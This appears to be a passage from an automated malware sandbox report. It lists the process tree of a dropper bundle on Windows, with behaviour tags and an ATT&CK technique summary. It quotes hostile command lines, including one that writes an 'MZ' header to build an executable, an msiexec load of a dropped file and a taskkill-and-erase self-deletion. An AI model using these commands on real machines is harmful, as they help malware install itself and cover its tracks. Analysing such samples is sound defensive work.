C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"13⤵PID:3928
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" EcHo "13⤵PID:3920
-
-
C:\Windows\SysWOW64\msiexec.exemsiexec -Y ..\lXQ2g.WC13⤵PID:3780
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵
- Executes dropped EXE
PID:2216 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "setup.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\setup.exe" & exit8⤵PID:1100
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "setup.exe" /f9⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:932
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe"C:\Users\Admin\AppData\Local\Temp\chenxiulan-game.exe"7⤵
- Executes dropped EXE
PID:2228
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"7⤵
- Executes dropped EXE
PID:2084
-
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2904 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2904 -s 16848⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
PID:3784
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun03f5d51697d04.exe4⤵
- Loads dropped DLL
PID:1840 -
C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun03f5d51697d04.exeSun03f5d51697d04.exe5⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1868 -
C:\Users\Admin\AppData\Local\Temp\is-UC2GR.tmp\Sun03f5d51697d04.tmp"C:\Users\Admin\AppData\Local\Temp\is-UC2GR.tmp\Sun03f5d51697d04.tmp" /SL5="$5015C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun03f5d51697d04.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1300 -
C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun03f5d51697d04.exe"C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun03f5d51697d04.exe" /SILENT7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:524 -
C:\Users\Admin\AppData\Local\Temp\is-7SA3M.tmp\Sun03f5d51697d04.tmp"C:\Users\Admin\AppData\Local\Temp\is-7SA3M.tmp\Sun03f5d51697d04.tmp" /SL5="$6015C,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun03f5d51697d04.exe" /SILENT8⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:1248 -
C:\Users\Admin\AppData\Local\Temp\is-17BI7.tmp\postback.exe"C:\Users\Admin\AppData\Local\Temp\is-17BI7.tmp\postback.exe" ss19⤵
- Executes dropped EXE
PID:2560
-
-
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0328255c4bce6fb.exe4⤵
- Loads dropped DLL
PID:1340 -
C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun0328255c4bce6fb.exeSun0328255c4bce6fb.exe5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:268
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0351a0558292.exe4⤵
- Loads dropped DLL
PID:2032
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun038db98f99bf9a.exe4⤵
- Loads dropped DLL
PID:1228
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0324aba28588c0.exe4⤵
- Loads dropped DLL
PID:1100
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun038db98f99bf9a.exeSun038db98f99bf9a.exe1⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
PID:288 -
C:\Users\Admin\Pictures\Adobe Films\BnbpIxC5RaMUqdV08_JMLpxz.exe"C:\Users\Admin\Pictures\Adobe Films\BnbpIxC5RaMUqdV08_JMLpxz.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2552
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 288 -s 14602⤵
- Program crash
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
PID:2856
-
-
C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun0351a0558292.exeSun0351a0558292.exe1⤵
- Executes dropped EXE
PID:784
-
C:\Users\Admin\AppData\Local\Temp\7zSCE703A86\Sun0324aba28588c0.exeSun0324aba28588c0.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:568
-
C:\Windows\system32\taskeng.exetaskeng.exe {B8A71648-C2F1-4DCE-9819-BBC0962E72E2} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:3304
-
C:\Windows\system32\taskeng.exetaskeng.exe {82FA15F3-0BCF-4A05-8BF1-3F895C4EBC34} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:2460
-
C:\Program Files\Mozilla Firefox\default-browser-agent.exe"C:\Program Files\Mozilla Firefox\default-browser-agent.exe" do-task2⤵PID:1588
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {30ACE16C-3036-4842-887E-2F0777181E87} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1208
-
C:\Windows\system32\taskeng.exetaskeng.exe {D79F1DC9-584F-48AF-B3B6-9FED6C92A61F} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:2184
-
C:\Users\Admin\AppData\Roaming\rubjrieC:\Users\Admin\AppData\Roaming\rubjrie2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1340
-
-
C:\Users\Admin\AppData\Roaming\rubjrieC:\Users\Admin\AppData\Roaming\rubjrie2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2576
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {E4458B1C-1B45-4CD1-83DC-DA06B03BA4F5} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:3240
-
C:\Windows\system32\taskeng.exetaskeng.exe {A93E91ED-18D0-4FEF-B980-679C4C5E17AA} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:908
-
C:\Users\Admin\AppData\Roaming\rubjrieC:\Users\Admin\AppData\Roaming\rubjrie2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2324
-
-
C:\Users\Admin\AppData\Roaming\rubjrieC:\Users\Admin\AppData\Roaming\rubjrie2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2136
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {1588C7E1-306E-4582-98FE-B74CBF4576C1} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:2984
-
C:\Users\Admin\AppData\Roaming\rubjrieC:\Users\Admin\AppData\Roaming\rubjrie2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3220
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {8944224B-FAAE-4040-B3D7-0B182F282BDE} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:4000
-
C:\Users\Admin\AppData\Roaming\rubjrieC:\Users\Admin\AppData\Roaming\rubjrie2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3676
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {DBF51DCC-482A-425D-9125-C1E783CB792E} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:2984
-
C:\Users\Admin\AppData\Roaming\rubjrieC:\Users\Admin\AppData\Roaming\rubjrie2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3884
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {83C8B9D5-9CC6-490F-BAA1-E0220A4A24A6} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:304
-
C:\Users\Admin\AppData\Roaming\rubjrieC:\Users\Admin\AppData\Roaming\rubjrie2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:3760
-
-
C:\Users\Admin\AppData\Roaming\rubjrieC:\Users\Admin\AppData\Roaming\rubjrie2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1132
-
-
C:\Users\Admin\AppData\Roaming\rubjrieC:\Users\Admin\AppData\Roaming\rubjrie2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1076
-
-
C:\Users\Admin\AppData\Roaming\rubjrieC:\Users\Admin\AppData\Roaming\rubjrie2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2856
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {E8249D7D-06AE-4CE1-A560-E44CC03453F3} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:1108
-
C:\Windows\system32\taskeng.exetaskeng.exe {61AA83B0-9DCA-4A11-B65A-B052056DC9DC} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:3208
-
C:\Users\Admin\AppData\Roaming\rubjrieC:\Users\Admin\AppData\Roaming\rubjrie2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2688
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {57A111E9-F830-475A-AB46-63EC6F4F29AB} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:2996
-
C:\Users\Admin\AppData\Roaming\rubjrieC:\Users\Admin\AppData\Roaming\rubjrie2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4000
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {43CF3700-1E66-498C-886E-D14A237D4C71} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:3624
-
C:\Users\Admin\AppData\Roaming\rubjrieC:\Users\Admin\AppData\Roaming\rubjrie2⤵PID:3856
-
-
C:\Windows\system32\taskeng.exetaskeng.exe {43FCC5DC-1DB9-4856-A76B-C3A47A6A77E7} S-1-5-18:NT AUTHORITY\System:Service:1⤵PID:2452
-
C:\Windows\system32\taskeng.exetaskeng.exe {2588C268-8A98-4819-B547-A44DAE026A20} S-1-5-21-3456797065-1076791440-4146276586-1000:JZCKHXIN\Admin:Interactive:[1]1⤵PID:1756
-
C:\Users\Admin\AppData\Roaming\rubjrieC:\Users\Admin\AppData\Roaming\rubjrie2⤵PID:3332
-
Network
MITRE ATT&CK Enterprise v6
Persistence
Modify Existing Service
1Registry Run Keys / Startup Folder
1Scheduled Task
1Defense Evasion
Disabling Security Tools
1Install Root Certificate
1Modify Registry
4Virtualization/Sandbox Evasion
1Web Service
1